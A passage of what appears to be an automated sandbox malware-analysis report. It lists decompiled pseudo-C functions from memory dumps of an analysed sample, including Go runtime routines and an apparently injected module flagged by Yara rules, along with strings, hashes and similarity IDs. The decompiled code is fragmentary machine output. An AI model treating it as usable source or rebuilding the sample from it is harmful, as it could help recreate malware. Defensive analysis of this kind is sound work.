                                                                                                                            					_v32 =  *((intOrPtr*)(__r14 + 0x30));
                                                                                                                            					_t59 = E01309600(0x147be78, __rdx,  &_v8, __r14);
                                                                                                                            					_t120 = _a8;
                                                                                                                            					if(_t120 != 0) {
                                                                                                                            						L4:
                                                                                                                            						_t124 =  *0x147be80; // 0xc000037000
                                                                                                                            						if(_t124 != 0) {
                                                                                                                            							_t116 =  *((intOrPtr*)(_t124 + 0x128));
                                                                                                                            							 *0x147be80 =  *((intOrPtr*)(_t124 + 0x128));
                                                                                                                            							 *0x147be88 =  *0x147be88 - 1;
                                                                                                                            							_t99 = _t124;
                                                                                                                            						}
                                                                                                                            						_v24 = _t120;
                                                                                                                            						if(_t99 != 0) {
                                                                                                                            							L11:
                                                                                                                            							_v16 = _t124;
                                                                                                                            							E01309820(0x147be78, _t129, _t145);
                                                                                                                            							_t120 = _v16;
                                                                                                                            							if( *(_t120 + 0xe4) != 0) {
                                                                                                                            								L33:
                                                                                                                            								_t103 = 0x1389e57;
                                                                                                                            								_t74 = 0x15;
                                                                                                                            								E01330BA0(0x1389e57, _t116, _t129);
                                                                                                                            								goto L34;
                                                                                                                            							} else {
                                                                                                                            								L12:
                                                                                                                            								if( *((long long*)(_t120 + 0xa8)) != 0) {
                                                                                                                            									L32:
                                                                                                                            									E01330BA0(0x1388642, _t116, _t129);
                                                                                                                            									goto L33;
                                                                                                                            								} else {
                                                                                                                            									L13:
                                                                                                                            									_t87 = _a16 & 0x000000ff;
                                                                                                                            									if(_t87 == 0) {
                                                                                                                            										L15:
                                                                                                                            										_t63 = 0;
                                                                                                                            										goto L23;
                                                                                                                            									} else {
                                                                                                                            										L14:
                                                                                                                            										_t128 = _v24;
                                                                                                                            										do {
                                                                                                                            											L27:
                                                                                                                            											_t92 =  *((intOrPtr*)(_t128 + 0x190));
                                                                                                                            											r8d =  *((intOrPtr*)(_t128 + 0x194));
                                                                                                                            											_t140 =  *((intOrPtr*)(_t128 + 0x998));
                                                                                                                            											r10d =  *((intOrPtr*)(_t128 + 0x194));
                                                                                                                            										} while (r10d != r8d);
                                                                                                                            										if(r8d != _t92 || _t140 != 0) {
                                                                                                                            											L31:
                                                                                                                            											E01330BA0(0x138b059, _t116, _t129);
                                                                                                                            											goto L32;
                                                                                                                            										} else {
                                                                                                                            											L30:
                                                                                                                            											_t63 = _t87;
                                                                                                                            											goto L23;
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							L7:
                                                                                                                            							E01334540(_t80, _t86, _t91, _t93, _t94, 0x147be78, _t127, _t129, _t145);
                                                                                                                            							_v40 = 0x147be78;
                                                                                                                            							E01309820(0x147be78, _t129, _t145);
                                                                                                                            							_t111 =  !=  ? 0x1401670 : 0x147be78;
                                                                                                                            							_t123 = _v40;
                                                                                                                            							_t71 = E01336960(0, _t74, _t80, _t86, _t91, _t93, _t94,  !=  ? 0x1401670 : 0x147be78, _v24, _t123, _t127, _t129, _t138, _t139, _t141, _t142, _t143, _t144, _t145, _t146);
                                                                                                                            							_t112 = _v32;
                                                                                                                            							_t20 = _t123 - 1; // -1
                                                                                                                            							 *((intOrPtr*)(_t112 + 0xd8)) = _t20;
                                                                                                                            							if( *((intOrPtr*)(_t112 + 0xd8)) == 1 &&  *((char*)(_t145 + 0xb1)) != 0) {
                                                                                                                            								 *((long long*)(_t145 + 0x10)) = 0xfffffade;
                                                                                                                            							}
                                                                                                                            							return _t71;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						L2:
                                                                                                                            						E0133EBE0(_t59, _t120, _t127,  &_v8, __r14);
                                                                                                                            						if(0x147be78 == 0) {
                                                                                                                            							L16:
                                                                                                                            							_t73 = E01309820(0x147be78,  &_v8, __r14);
                                                                                                                            							if((_a16 & 0x000000ff) == 0) {
                                                                                                                            								L18:
                                                                                                                            								_t114 = _v32;
                                                                                                                            								_t34 = _t120 - 1; // -1
                                                                                                                            								 *((intOrPtr*)(_t114 + 0xd8)) = _t34;
                                                                                                                            								if( *((intOrPtr*)(_t114 + 0xd8)) == 1 &&  *((char*)(_t145 + 0xb1)) != 0) {
                                                                                                                            									 *((long long*)(_t145 + 0x10)) = 0xfffffade;
                                                                                                                            								}
                                                                                                                            								return _t73;
                                                                                                                            							} else {
                                                                                                                            								L17:
                                                                                                                            								asm("lock xadd [edx], ecx");
                                                                                                                            								if(0xfffffffe < 0) {
                                                                                                                            									L22:
                                                                                                                            									_t63 = E01330BA0(0x138b726, _t116,  &_v8);
                                                                                                                            									L23:
                                                                                                                            									 *(_t120 + 0xe4) = _t63;
                                                                                                                            									_t125 = _v24;
                                                                                                                            									 *((long long*)(_t120 + 0xa8)) = _t125;
                                                                                                                            									_t64 = E01309900(_t120 + 0x118, _t129, _t145);
                                                                                                                            									_t121 = _v32;
                                                                                                                            									_t45 = _t125 - 1; // -1
                                                                                                                            									 *((intOrPtr*)(_t121 + 0xd8)) = _t45;
                                                                                                                            									if( *((intOrPtr*)(_t121 + 0xd8)) == 1 &&  *((char*)(_t145 + 0xb1)) != 0) {
                                                                                                                            										 *((long long*)(_t145 + 0x10)) = 0xfffffade;
                                                                                                                            									}
                                                                                                                            									return _t64;
                                                                                                                            								} else {
                                                                                                                            									goto L18;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							L3:
                                                                                                                            							_t120 = 0x147be78;
                                                                                                                            							goto L4;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L35:
                                                                                                                            					L34:
                                                                                                                            					_a8 = _t103;
                                                                                                                            					_a16 = _t74;
                                                                                                                            					E01356200(_t124, _t129);
                                                                                                                            				}
                                                                                                                            			}







































                                                                                                                            0x01336f9d
                                                                                                                            0x00000000
                                                                                                                            0x01336f9d
                                                                                                                            0x01336f97
                                                                                                                            0x00000000
                                                                                                                            0x013371ca
                                                                                                                            0x013371ca
                                                                                                                            0x013371cf
                                                                                                                            0x013371d3
                                                                                                                            0x013371dd

                                                                                                                            Strings
                                                                                                                            • startm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateEnvironmentBlockCreateIoCompletionPortDateline Standard Tim, xrefs: 013371B8
                                                                                                                            • startm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCur, xrefs: 013371A7
                                                                                                                            • startm: p has runnable gsstoplockedm: not runnableunexpected fault address unexpected key value typeBougainville Standard TimeCentral Asia Standard TimeCertFreeCertificateContextE. Australia Standard TimeEkaterinburg Standard TimeGetFileInformationByHandleLine, xrefs: 01337196
                                                                                                                            • startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionswork.nwait was > work.nproc args stack map entries for Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia, xrefs: 013370FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: startm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCur$startm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateEnvironmentBlockCreateIoCompletionPortDateline Standard Tim$startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionswork.nwait was > work.nproc args stack map entries for Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia$startm: p has runnable gsstoplockedm: not runnableunexpected fault address unexpected key value typeBougainville Standard TimeCentral Asia Standard TimeCertFreeCertificateContextE. Australia Standard TimeEkaterinburg Standard TimeGetFileInformationByHandleLine
                                                                                                                            • API String ID: 0-1045336544
                                                                                                                            • Opcode ID: cc8b55fdffd703e6b2bbe2fde4c01c12c5b3cc751662ca9b0552990e82e7418e
                                                                                                                            • Instruction ID: eaefb812e366580dfbdacdd04f51705cc206feb60c73295b48e448355cb6cfc2
                                                                                                                            • Opcode Fuzzy Hash: cc8b55fdffd703e6b2bbe2fde4c01c12c5b3cc751662ca9b0552990e82e7418e
                                                                                                                            • Instruction Fuzzy Hash: 0E6107B6209B80CADB15CB18E4907AEBB64F3C57ACF485626EB9D077A5CF38C145CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 53%
                                                                                                                            			E0000025B25BF8A77574(void* __edx, signed int __edi, long long __rbx, void* __rcx, void* __rsi, long long __rbp, char _a8) {
                                                                                                                            				void* _v32;
                                                                                                                            				char _v64;
                                                                                                                            				intOrPtr _v72;
                                                                                                                            				char _v80;
                                                                                                                            				long long _v96;
                                                                                                                            				long long _v104;
                                                                                                                            				intOrPtr _v112;
                                                                                                                            				intOrPtr _t32;
                                                                                                                            				signed int _t33;
                                                                                                                            				void* _t34;
                                                                                                                            				intOrPtr _t36;
                                                                                                                            				intOrPtr _t38;
                                                                                                                            				intOrPtr _t50;
                                                                                                                            				intOrPtr _t56;
                                                                                                                            				intOrPtr _t58;
                                                                                                                            				void* _t59;
                                                                                                                            				intOrPtr _t60;
                                                                                                                            				void* _t61;
                                                                                                                            				void* _t62;
                                                                                                                            				void* _t77;
                                                                                                                            				intOrPtr _t79;
                                                                                                                            				void* _t106;
                                                                                                                            				void* _t107;
                                                                                                                            				void* _t111;
                                                                                                                            				void* _t115;
                                                                                                                            				void* _t123;
                                                                                                                            				int _t125;
                                                                                                                            
                                                                                                                            				_t77 = _t115;
                                                                                                                            				 *((long long*)(_t77 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t77 + 0x18)) = __rbp;
                                                                                                                            				 *((long long*)(_t77 + 0x20)) = __rsi;
                                                                                                                            				_t107 = __edx;
                                                                                                                            				_t111 = __rcx;
                                                                                                                            				 *((intOrPtr*)(_t77 + 0x10)) = 0x10;
                                                                                                                            				_t62 = __edi - 0x10;
                                                                                                                            				if (_t62 <= 0) goto 0xf8a77764;
                                                                                                                            				_t5 = _t107 - 0x10; // -16
                                                                                                                            				_t60 = _t5;
                                                                                                                            				malloc(_t125);
                                                                                                                            				r14d = 1;
                                                                                                                            				_t81 = _t77;
                                                                                                                            				if (_t62 >= 0) goto 0xf8a775c9;
                                                                                                                            				r15d = 0;
                                                                                                                            				if (((__edi & 0x8000000f) - r14d | 0xfffffff0) + r14d == 0) goto 0xf8a775d8;
                                                                                                                            				goto 0xf8a7775f;
                                                                                                                            				_t7 = _t107 - 0x10; // -16
                                                                                                                            				_t32 = _t7;
                                                                                                                            				_v96 =  &_a8;
                                                                                                                            				_v104 =  &_v80;
                                                                                                                            				r8d = 0x10;
                                                                                                                            				_v112 = _t32;
                                                                                                                            				0xf8a60d8c(_t123, _t106);
                                                                                                                            				if (_t32 != 0) goto 0xf8a77780;
                                                                                                                            				if ( *((intOrPtr*)(__edx + __rcx - 0x10)) != _v80) goto 0xf8a7775c;
                                                                                                                            				_t79 =  *((intOrPtr*)(__edx + __rcx - 8));
                                                                                                                            				if (_t79 != _v72) goto 0xf8a7775c;
                                                                                                                            				_t33 =  *0xf8a9e82c & 0x0000ffff;
                                                                                                                            				if (_t33 != 0) goto 0xf8a776a7;
                                                                                                                            				_t50 =  *0xf8a9e824; // 0x1fb1c
                                                                                                                            				r9d = 0x10;
                                                                                                                            				_v104 = 0xf8a9f990;
                                                                                                                            				_v112 = r15d;
                                                                                                                            				0xf8a607a4();
                                                                                                                            				if (_t33 != 0) goto 0xf8a77789;
                                                                                                                            				r8d = _t60;
                                                                                                                            				0xf8a60988();
                                                                                                                            				if (_t33 != 0) goto 0xf8a77792;
                                                                                                                            				0xf8a60ac0();
                                                                                                                            				if (_t33 == 0) goto 0xf8a776bf;
                                                                                                                            				goto 0xf8a7779b;
                                                                                                                            				if (_t33 != r14w) goto 0xf8a777b4;
                                                                                                                            				_t34 = E0000025B25BF8A797B0(_t50, __edi, _t59, _t61, _t77, __rcx, _t60);
                                                                                                                            				r8d = _t60;
                                                                                                                            				E0000025B25BF8A73230(_t34,  &_v64, _t77);
                                                                                                                            				_t36 = E0000025B25BF8A73240( &_v64);
                                                                                                                            				_t56 =  *0xf8a9e820; // 0x397b8
                                                                                                                            				_t22 = _t79 + 0xe10; // 0xe10
                                                                                                                            				r14d = _t36;
                                                                                                                            				if (_t22 - _t56 > 0) goto 0xf8a77704;
                                                                                                                            				free(__rsi);
                                                                                                                            				E0000025B25BF8A6CEEC(_t81);
                                                                                                                            				goto 0xf8a77764;
                                                                                                                            				_t38 = E0000025B25BF8A73240( &_v64);
                                                                                                                            				_t58 = _t38;
                                                                                                                            				if (_t38 == 0) goto 0xf8a777ac;
                                                                                                                            				if (_t58 - _t60 > 0) goto 0xf8a777ac;
                                                                                                                            				E0000025B25BF8A73278(_t58,  &_v64);
                                                                                                                            				if (_t79 == 0) goto 0xf8a777a4;
                                                                                                                            				r8d = _t58;
                                                                                                                            				E0000025B25BF8A797B0(0x25bf8a9eb80, _t58, _t59, _t61, _t111, _t79, _t60);
                                                                                                                            				 *0xf8a9e820 = r14d;
                                                                                                                            				E0000025B25BF8A731C4(_t79, _t81,  &_v64, _t79);
                                                                                                                            				free(??);
                                                                                                                            				goto 0xf8a77766;
                                                                                                                            				free(??);
                                                                                                                            				return 0;
                                                                                                                            			}

                                                                                                                            0x25bf8a776df
                                                                                                                            0x25bf8a776e5
                                                                                                                            0x25bf8a776ea
                                                                                                                            0x25bf8a776ef
                                                                                                                            0x25bf8a776fd
                                                                                                                            0x25bf8a77702
                                                                                                                            0x25bf8a77709
                                                                                                                            0x25bf8a7770e
                                                                                                                            0x25bf8a77712
                                                                                                                            0x25bf8a7771a
                                                                                                                            0x25bf8a77727
                                                                                                                            0x25bf8a7772f
                                                                                                                            0x25bf8a77731
                                                                                                                            0x25bf8a7773a
                                                                                                                            0x25bf8a77744
                                                                                                                            0x25bf8a7774b
                                                                                                                            0x25bf8a77753
                                                                                                                            0x25bf8a7775a
                                                                                                                            0x25bf8a7775f
                                                                                                                            0x25bf8a7777f

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2761444284-0
                                                                                                                            • Opcode ID: daa954f963036e8b3c4eac29bf1e0a8b431d3dd5db7c0072ee357d8f39c2b8a7
                                                                                                                            • Instruction ID: 9ac61cd18c12dad04580cb7706af32332ad2bd217e776399c0365bc205840c62
                                                                                                                            • Opcode Fuzzy Hash: daa954f963036e8b3c4eac29bf1e0a8b431d3dd5db7c0072ee357d8f39c2b8a7
                                                                                                                            • Instruction Fuzzy Hash: 8B510027300E0191EE1AAF21DC593AD6391F790BA2FB54426FE1A57FCADF78C4119368
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 63%
                                                                                                                            			E0000025B25BF8A6D5A0(intOrPtr __ebx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __r14) {
                                                                                                                            				void* __rbp;
                                                                                                                            				signed int _t56;
                                                                                                                            				intOrPtr _t62;
                                                                                                                            				void* _t75;
                                                                                                                            				signed int _t82;
                                                                                                                            				void* _t86;
                                                                                                                            				void* _t88;
                                                                                                                            				void* _t89;
                                                                                                                            				void* _t98;
                                                                                                                            				signed long long _t101;
                                                                                                                            				void* _t103;
                                                                                                                            				void* _t107;
                                                                                                                            				signed long long _t120;
                                                                                                                            				long long _t133;
                                                                                                                            				void* _t136;
                                                                                                                            				void* _t137;
                                                                                                                            				void* _t138;
                                                                                                                            				void* _t140;
                                                                                                                            				void* _t141;
                                                                                                                            				void* _t143;
                                                                                                                            				void* _t152;
                                                                                                                            				void* _t156;
                                                                                                                            				signed long long _t159;
                                                                                                                            
                                                                                                                            				_t133 = __rdi;
                                                                                                                            				_t128 = __rdx;
                                                                                                                            				_t72 = __ebx;
                                                                                                                            				_t98 = _t140;
                                                                                                                            				 *((long long*)(_t98 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t98 + 0x10)) = __rdi;
                                                                                                                            				 *((long long*)(_t98 + 0x18)) = __r14;
                                                                                                                            				_t138 = _t98 - 0x418;
                                                                                                                            				_t141 = _t140 - 0x510;
                                                                                                                            				 *(_t138 - 0x78) =  *(_t138 - 0x78) & 0x00000000;
                                                                                                                            				_t107 = __rcx;
                                                                                                                            				r8d = 0x3ff;
                                                                                                                            				 *((long long*)(_t138 - 0x80)) = 0xf8a8bad0;
                                                                                                                            				 *((char*)(_t138 + 0x10)) = 0;
                                                                                                                            				E0000025B25BF8A793C0(_t75, 0, _t86, _t89, _t138 + 0x11, __rdx, _t143);
                                                                                                                            				 *((char*)(_t138 - 0x70)) = 0;
                                                                                                                            				_t12 = _t128 + 0x7f; // 0x7f
                                                                                                                            				r8d = _t12;
                                                                                                                            				E0000025B25BF8A793C0(_t75, 0, _t86, _t89, _t138 - 0x6f, __rdx, _t143);
                                                                                                                            				 *(_t141 + 0x40) =  *(_t141 + 0x40) & 0x00000000;
                                                                                                                            				_t15 = _t128 + 0x38; // 0x38
                                                                                                                            				r8d = _t15;
                                                                                                                            				E0000025B25BF8A793C0(_t75, 0, _t86, _t89, _t141 + 0x48, __rdx, _t143);
                                                                                                                            				_t82 =  *0xf8a9d888; // 0xd878
                                                                                                                            				if (_t82 == 0) goto 0xf8a6d7ba;
                                                                                                                            				E0000025B25BF8A75068(_t88, 0xf8a8bad0, _t141 + 0x40, __rdx, _t136, _t152);
                                                                                                                            				E0000025B25BF8A794CC(__ebx, _t75, 0xf8a8bad0,  *((intOrPtr*)(_t141 + 0x50)), __rdx, 0xf8a8bac4, _t107, _t137);
                                                                                                                            				r9d =  *0xf8aa6b40;
                                                                                                                            				E0000025B25BF8A794CC(__ebx, _t75, 0xf8a8bad0, _t138 - 0x70, _t128, 0xf8a8bad4, _t107);
                                                                                                                            				_t159 = __r14 | 0xffffffff;
                                                                                                                            				_t100 = _t138 - 0x70;
                                                                                                                            				_t109 = _t159 + 1;
                                                                                                                            				if ( *((char*)(_t138 - 0x70 + _t159 + 1)) != 0) goto 0xf8a6d669;
                                                                                                                            				E0000025B25BF8A77A30(0xd,  *((char*)(_t138 - 0x70 + _t159 + 1)), _t100, _t128);
                                                                                                                            				_t56 =  *0xf8a9d888; // 0xd878
                                                                                                                            				r9d = __ebx;
                                                                                                                            				 *(_t141 + 0x28) = _t56;
                                                                                                                            				_t101 =  *0xf8a9d880; // 0x390780000d877
                                                                                                                            				 *(_t141 + 0x20) = _t101;
                                                                                                                            				E0000025B25BF8A747D0( *((char*)(_t138 - 0x70 + _t159 + 1)), _t109, _t100, _t141 + 0x40, __rdi, _t136, _t138 - 0x70, _t107, _t156);
                                                                                                                            				_t103 = _t159 + 1;
                                                                                                                            				if ( *((char*)( *((intOrPtr*)(_t141 + 0x48)) + _t103)) != 0) goto 0xf8a6d6ae;
                                                                                                                            				if (_t103 != 0) goto 0xf8a6d6d6;
                                                                                                                            				_t120 = _t138 + 0x10;
                                                                                                                            				E0000025B25BF8A794CC(_t72, 0xd, _t103, _t120, _t133, 0xf8a8bac4,  *((intOrPtr*)(_t141 + 0x50)));
                                                                                                                            				goto 0xf8a6d6eb;
                                                                                                                            				 *(_t141 + 0x20) = _t120;
                                                                                                                            				E0000025B25BF8A794CC(_t72, 0xd, _t103, _t138 + 0x10, _t133, 0xf8a8bad8,  *((intOrPtr*)(_t141 + 0x50)));
                                                                                                                            				E0000025B25BF8A78AE4();
                                                                                                                            				E0000025B25BF8A77A30(0x1b, _t103, _t103, _t133);
                                                                                                                            				r9d = 0;
                                                                                                                            				 *((long long*)(_t141 + 0x38)) = 0xf8a9d890;
                                                                                                                            				_t62 =  *0xf8a9d88c; // 0xd8da
                                                                                                                            				 *((intOrPtr*)(_t141 + 0x30)) = _t62;
                                                                                                                            				_t105 = _t138 - 0x80;
                                                                                                                            				 *(_t141 + 0x28) = _t138 - 0x80;
                                                                                                                            				 *(_t141 + 0x20) =  *(_t141 + 0x20) & 0x00000000;
                                                                                                                            				 *0xf8a8b958();
                                                                                                                            				E0000025B25BF8A6D2BC(_t138 - 0x80, _t105);
                                                                                                                            				if ( *((char*)( *(_t141 + 0x40) + _t159 + 1)) != 0) goto 0xf8a6d74b;
                                                                                                                            				 *(_t141 + 0x20) =  *(_t141 + 0x60);
                                                                                                                            				 *0xf8a8b968();
                                                                                                                            				if (E0000025B25BF8A6D8A0() != 0) goto 0xf8a6d798;
                                                                                                                            				 *0xf8a8b928();
                                                                                                                            				 *"rb"();
                                                                                                                            				if (1 - 4 < 0) goto 0xf8a6d6f2;
                                                                                                                            				goto 0xf8a6d79e;
                                                                                                                            				 *0xf8a8b928();
                                                                                                                            				E0000025B25BF8A7505C(_t88, _t105, _t141 + 0x40,  *(_t141 + 0x40), _t136,  *((intOrPtr*)(_t141 + 0x58)));
                                                                                                                            				 *0xf8a9d888 =  *0xf8a9d888 & 0x00000000;
                                                                                                                            				return E0000025B25BF8A78B14();
                                                                                                                            			}


                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$_errno_flsbuf_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3206768600-0
                                                                                                                            • Opcode ID: 3a55a556e6a76951abe6aec8a4989afcb54de1f4fbcc6836e17e30bccf138cf2
                                                                                                                            • Instruction ID: 5d9a9ce2b99c41d8f11936564ece3aae4bddae253629be6b97d80c42a2a70617
                                                                                                                            • Opcode Fuzzy Hash: 3a55a556e6a76951abe6aec8a4989afcb54de1f4fbcc6836e17e30bccf138cf2
                                                                                                                            • Instruction Fuzzy Hash: A851AB37204E458AEF129B61EC4839D73A0F3847A6F241122FA6D03F9ADF38C446C768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E01311F80(void* __eax, signed int __ebx, void* __esp, signed long long __rax, signed int __rdx, void* __rsi, long long __rbp, void* __r14, signed long long _a8, signed int _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				signed int _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				void* _t65;
                                                                                                                            				intOrPtr _t74;
                                                                                                                            				unsigned char _t76;
                                                                                                                            				unsigned char _t80;
                                                                                                                            				intOrPtr _t84;
                                                                                                                            				void* _t86;
                                                                                                                            				long long _t103;
                                                                                                                            				intOrPtr _t120;
                                                                                                                            				signed long long _t122;
                                                                                                                            				signed long long _t128;
                                                                                                                            				signed long long _t129;
                                                                                                                            				signed long long _t130;
                                                                                                                            				void* _t143;
                                                                                                                            				void* _t146;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t147 = __r14;
                                                                                                                            					_t141 = __rbp;
                                                                                                                            					_t130 = __rdx;
                                                                                                                            					_t100 = __rax;
                                                                                                                            					_t86 = __esp;
                                                                                                                            					_t67 = __ebx;
                                                                                                                            					if(_t143 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L18;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t141 =  &_v8;
                                                                                                                            					if(__rdx >= 0x88) {
                                                                                                                            						L17:
                                                                                                                            						_t100 = _t130;
                                                                                                                            						E013588C0();
                                                                                                                            						goto L18;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					_t120 =  *((intOrPtr*)(__rax + 0x28 + __rdx * 8));
                                                                                                                            					asm("o16 nop [eax+eax]");
                                                                                                                            					if( *((intOrPtr*)(_t120 + 0x38)) != __rsi) {
                                                                                                                            						L16:
                                                                                                                            						_t67 = 0x28;
                                                                                                                            						E01330BA0(0x138d7e2, 0x14a19f8, _t141);
                                                                                                                            						goto L17;
                                                                                                                            					}
                                                                                                                            					L3:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_a16 = __ebx;
                                                                                                                            					_v16 = __rdx;
                                                                                                                            					_t136 = 0x14cf960;
                                                                                                                            					if(_t120 != 0x14cf960) {
                                                                                                                            						L4:
                                                                                                                            						_t84 =  *0x14a16f0; // 0x0
                                                                                                                            						if( *((intOrPtr*)(_t120 + 0x58)) != _t84 + 3) {
                                                                                                                            							L15:
                                                                                                                            							E01330BA0(0x138a0e8, 0x14a19f8, _t141);
                                                                                                                            							goto L16;
                                                                                                                            						} else {
                                                                                                                            							L5:
                                                                                                                            							_t136 = __rdx + __rdx * 2 << 6;
                                                                                                                            							E01312A40(__eax, (__rdx + __rdx * 2 << 6) + 0x14a19f8, _t120, _t120, __rdx + __rdx * 2 << 6,  &_v8, __r14);
                                                                                                                            							_t130 = _v16;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L6:
                                                                                                                            					_t122 = _t130 + _t130 * 2 << 6;
                                                                                                                            					_t103 = _t122 + 0x14a19f8;
                                                                                                                            					L013126C0(_t86, _t103, _t141, _t147);
                                                                                                                            					if(_t103 == 0) {
                                                                                                                            						L14:
                                                                                                                            						E01330BA0(0x1388000, 0x14a19f8, _t141);
                                                                                                                            						goto L15;
                                                                                                                            					}
                                                                                                                            					L7:
                                                                                                                            					if( *((intOrPtr*)(_t103 + 0x38)) == _t122) {
                                                                                                                            						L13:
                                                                                                                            						E01330BA0(0x138a2f8, 0x14a19f8, _t141);
                                                                                                                            						goto L14;
                                                                                                                            					}
                                                                                                                            					L8:
                                                                                                                            					_v24 = _t103;
                                                                                                                            					_t74 =  *0x14a16f0; // 0x0
                                                                                                                            					 *((intOrPtr*)(_t103 + 0x58)) = _t74 + 3;
                                                                                                                            					E0132A100(0x14a19f8, _t136, _t141, _t147);
                                                                                                                            					_t76 = _a16 & 0x000000ff;
                                                                                                                            					_t80 = _t76;
                                                                                                                            					asm("o16 nop [eax+eax]");
                                                                                                                            					if(_t76 >> 1 >= 0x44) {
                                                                                                                            						L12:
                                                                                                                            						E013588C0();
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					L9:
                                                                                                                            					asm("lock dec eax");
                                                                                                                            					if(_t80 == 5) {
                                                                                                                            						_t129 = _a8;
                                                                                                                            						_t130 =  *((intOrPtr*)(_t129 + 0x20));
                                                                                                                            						asm("lock dec eax");
                                                                                                                            						 *((long long*)(_t129 + 0x20)) = 0;
                                                                                                                            					}
                                                                                                                            					E0132A1E0(_t141, _t147);
                                                                                                                            					_t65 = E0131C140(_t67, 0x14cfc60, ( *(_v24 + 0x20) << 0xd) - _t130 *  *(_v24 + 0x68),  *((intOrPtr*)(_a8 + 8)), _t141, _t146, _t147);
                                                                                                                            					_t128 = _a8;
                                                                                                                            					 *((long long*)(_t128 + 8)) = 0;
                                                                                                                            					 *((long long*)(_t128 + 0x28 + _v16 * 8)) = _v24;
                                                                                                                            					return _t65;
                                                                                                                            					L19:
                                                                                                                            					L18:
                                                                                                                            					_a8 = _t100;
                                                                                                                            					_a16 = _t67;
                                                                                                                            					E01356200(_t130, _t141);
                                                                                                                            				}
                                                                                                                            			}




















                                                                                                                            0x0131218f
                                                                                                                            0x01312193
                                                                                                                            0x0131219d

                                                                                                                            Strings
                                                                                                                            • refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zer, xrefs: 0131216B
                                                                                                                            • bad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv, xrefs: 0131215A
                                                                                                                            • span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largewirep: invalid p state) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Sta, xrefs: 01312138
                                                                                                                            • out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCrea, xrefs: 01312149
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
